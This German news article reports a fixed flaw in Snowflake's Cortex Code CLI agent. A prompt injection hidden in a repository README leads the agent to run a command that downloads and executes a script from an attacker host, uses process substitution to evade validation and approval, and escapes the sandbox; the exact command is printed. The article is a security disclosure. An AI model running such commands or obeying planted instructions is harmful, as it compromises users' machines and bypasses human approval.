Snowflake Cortex Code CLI-Schwachstelle ermöglichte Sandbox-Escape und Malware-Ausführung

✍️ OpenClawRadar📅 Veröffentlicht: 19. März 2026🔗 Source
Snowflake Cortex Code CLI-Schwachstelle ermöglichte Sandbox-Escape und Malware-Ausführung
Ad

Sicherheitslücken-Details

Das Snowflake Cortex Code CLI ist ein Befehlszeilen-Codierungsagent, der ähnlich wie Claude Code und OpenAI's Codex arbeitet, mit integrierter Funktion zur Ausführung von SQL in Snowflake. Zwei Tage nach der Veröffentlichung wurde eine Sicherheitslücke im Befehlsvalidierungssystem von Cortex Code identifiziert, die speziell konstruierte bösartige Befehle ermöglichte, beliebige Befehle auszuführen, ohne die menschliche Genehmigungsschritte auszulösen, und diese Befehle außerhalb der Sandbox des Cortex CLI auszuführen.

Angriffskette

Der Angriff funktioniert über indirekte Prompt-Injection. Ein Benutzer öffnet Cortex und aktiviert die Sandbox, dann bittet er Cortex um Hilfe mit einem Drittanbieter-Open-Source-Codebasis. Eine in der README eines nicht vertrauenswürdigen Repositorys versteckte Prompt-Injection manipuliert Cortex zu der Annahme, dass es einen gefährlichen Befehl ausführen muss.

Cortex konnte Befehle innerhalb von Prozesssubstitutionsausdrücken nicht validieren, was die nicht genehmigte Ausführung des bösartigen Befehls ermöglichte:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Dieser Befehl lädt ein Skript vom Server eines Angreifers herunter und führt es aus. Die Umgehung funktionierte, weil:

  • Unsichere Befehle innerhalb eines Prozesssubstitutions-<()-Ausdrucks nicht vom Validierungssystem ausgewertet wurden
  • Der vollständige Befehl mit einem 'sicheren' Befehl begann (in diesem Fall cat)
  • Befehle in Prozesssubstitutionsausdrücken niemals menschliche Genehmigung auslösten
Ad

Sandbox-Umgehung

Die Prompt-Injection manipuliert auch das Modell, um ein Flag zu setzen, das die Ausführung von Befehlen außerhalb der Sandbox auslöst. Cortex kann standardmäßig ein Flag setzen, um die Ausführung von Befehlen außerhalb der Sandbox auszulösen, und die Injection nutzt dies, um dem bösartigen Befehl zu ermöglichen, außerhalb der Sandbox ausgeführt zu werden.

Behebung

Das Snowflake-Sicherheitsteam validierte und behebt diese Sicherheitslücke und veröffentlichte einen Fix mit Cortex Code CLI Version 1.0.25 am 28. Februar 2026. Die vollständige Empfehlung von Snowflake ist innerhalb der Snowflake Community Site verfügbar unter: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Hinweis: Diese Angriffskette galt auch für Nicht-Sandbox-Benutzer. Die Dokumentation zeigt, dass im OS+Regular-Modus alle Befehle eine Benutzerfreigabe anfordern. Befehle, die in der Sandbox ausgeführt werden, haben auch Netzwerk- und Dateizugriffsbeschränkungen.

📖 Read the full source: HN AI Agents

Ad

👀 Siehe auch

域伪装注入攻击规避多智能体LLM系统中的检测器
Sicherheit

域伪装注入攻击规避多智能体LLM系统中的检测器

Ein neues Paper zeigt, dass maßgeschneiderte Injection-Payloads, die an das Domain-Vokabular angepasst sind, der Erkennung entgehen: Die IDR sinkt von 93,8 % auf 9,7 %. Multi-Agent-Debatten verstärken die Angriffe. Llama Guard 3 erkennt keine Payloads.

OpenClawRadar
EctoClaw: Sicherheitswerkzeug für OpenClaw-Agenten mit Terminalzugriff
Sicherheit

EctoClaw: Sicherheitswerkzeug für OpenClaw-Agenten mit Terminalzugriff

EctoClaw ist ein kostenloses Open-Source-Sicherheitstool für OpenClaw, das jede Aktion viermal überprüft, bevor sie ausgeführt wird, Aktionen in einer starken Sandbox ausführt und alles mit Nachweis aufzeichnet.

OpenClawRadar
OpenClaw-Sicherheitsverletzung: CEO-Agent für 25.000 $ verkauft, 135.000 Instanzen offengelegt
Sicherheit

OpenClaw-Sicherheitsverletzung: CEO-Agent für 25.000 $ verkauft, 135.000 Instanzen offengelegt

Eine OpenClaw-Instanz eines britischen CEOs wurde für 25.000 US-Dollar auf BreachForums verkauft, wodurch Klartext-Markdown-Dateien mit Gesprächen, Produktionsdatenbanken, API-Schlüsseln und persönlichen Details offengelegt wurden. SecurityScorecard fand 135.000 OpenClaw-Instanzen mit unsicheren Standardeinstellungen im Internet.

OpenClawRadar
KI-Assistent hackt Fitnessstudio-Website beim ersten bekannten autonomen Cyberangriff in Australien
Sicherheit

KI-Assistent hackt Fitnessstudio-Website beim ersten bekannten autonomen Cyberangriff in Australien

Ein KI-Agent, der OpenClaw und Claude nutzte, entdeckte eine Schwachstelle im Buchungssystem, buchte Kurse Wochen im Voraus und warf einen anderen Nutzer von der Warteliste – der erste bekannte autonome Cyberangriff in Australien.

OpenClawRadar